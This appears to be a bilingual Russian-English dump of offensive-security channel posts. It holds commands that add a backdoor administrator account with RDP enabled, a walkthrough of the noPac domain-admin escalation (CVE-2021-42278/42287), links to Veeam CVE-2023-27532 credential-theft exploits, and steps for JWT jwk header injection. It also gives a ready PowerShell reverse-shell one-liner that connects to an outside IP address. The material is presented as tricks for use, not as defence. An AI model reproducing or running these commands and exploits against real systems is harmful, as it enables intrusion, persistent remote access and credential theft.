Сreate user via bat file extension

#RU

На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.

#EN

I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.

net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0

Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)

Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?

1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:

Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota

Чтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте sAMAccountName на конце $. Однако прикол в том, что этот символ не всегда проверяется. Атрибутом имени учетной записи компьютера является sAMAccountName. Этот атрибут можно увидеть и отредактировать вручную с помощью ADSIEdit Tool

2. При запросе билета на обслуживание сначала необходимо предъявить TGT. Если запрашиваемый билет не найден KDC, KDC автоматически выполняет повторный поиск с последующим $. Если TGT получен для username, а пользователь username удален, то используя этот TGT для запроса сервисного билета для другого пользователя через S4U2self приведет к тому, что KDC будет искать username$ в AD.

Объединяя эти вулны, мы имеем примерно такой сценарий

Пользователь запрашивает TGT. Затем пользователь может попытаться удалить или переименовать исходную учетную запись компьютера. Получив TGT, пользователь может начать эксплуатировать sAMAccountName. А полностью зная, что KDC поставляет тикеты и временные сеансовые ключи пользователям и компьютерам в домене, мы это можем использовать для повышения привилегий

Сценарий эксплуатации выглядит так:

1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается Kerberos TGT с использованием обновленного имени учетной записи компьютера.
4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения S4U2self

Звучит душно, благо есть noPac, который эксплуатирует данную проблему

THX:

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

https://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml

https://github.com/WazeHell/sam-the-admin

PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!

usage:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Veeam Backup and Replication (CVE-2023-27532)

Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.

Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/

Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532

Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532

#veeam #credentials #rce #cve

JWT header parameter injections

Согласно спецификации JWS, обязательным является только параметр alg. Однако на практике заголовки JWT часто содержат несколько других параметров. Следующие из них представляют особый интерес для нас.

jwk (JSON Web Key) - Предоставляет встроенный объект JSON, представляющий ключ.

jku (JSON Web Key Set URL) - Предоставляет URL, по которому серверы могут получить набор ключей, содержащих правильный ключ.

kid (Key ID) - предоставляет идентификатор, который серверы могут использовать для определения правильного ключа в случаях, когда есть несколько ключей на выбор. В зависимости от формата ключа, он может иметь соответствующий параметр kid.

Как вы видите, эти контролируемые пользователем параметры указывают серверу-получателю, какой ключ использовать при проверке подписи.

Спецификация JSON Web Signature (JWS) описывает дополнительный параметр заголовка jwk, который серверы могут использовать для встраивания своего открытого ключа непосредственно в сам токен в формате JWK.

{
{
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
"typ": "JWT",
"alg": "RS256",
"jwk": {
"kty": "RSA",
"e": "AQAB",
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
"n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m"
}
}

В идеале серверы должны использовать только ограниченный белый список открытых ключей для проверки подписей JWT. Однако неправильно настроенные серверы иногда используют любой ключ, встроенный в параметр jwk.

Вы можете использовать это поведение, подписав модифицированный JWT с помощью собственного закрытого ключа RSA, а затем вставив соответствующий открытый ключ в заголовок jwk.
Хотя вы можете вручную добавить или изменить параметр jwk в Burp, расширение JWT Editor предоставляет полезную функцию, которая поможет вам проверить эту уязвимость:

Сгенерируйте новый ключ RSA.

Отправьте запрос, содержащий JWT, в Burp Repeater.

Измените пэйлоад токена по своему усмотрению.

Выберите Embedded JWK. Когда появится запрос, выберите только что сгенерированный RSA-ключ.

Отправьте запрос, чтобы проверить, как ответит сервер.

Вы также можете выполнить эту атаку вручную, добавив заголовок jwk самостоятельно. Однако вам также может понадобиться обновить параметр kid заголовка JWT, чтобы он соответствовал kid встроенного ключа. Встроенная атака расширения сделает этот шаг за вас.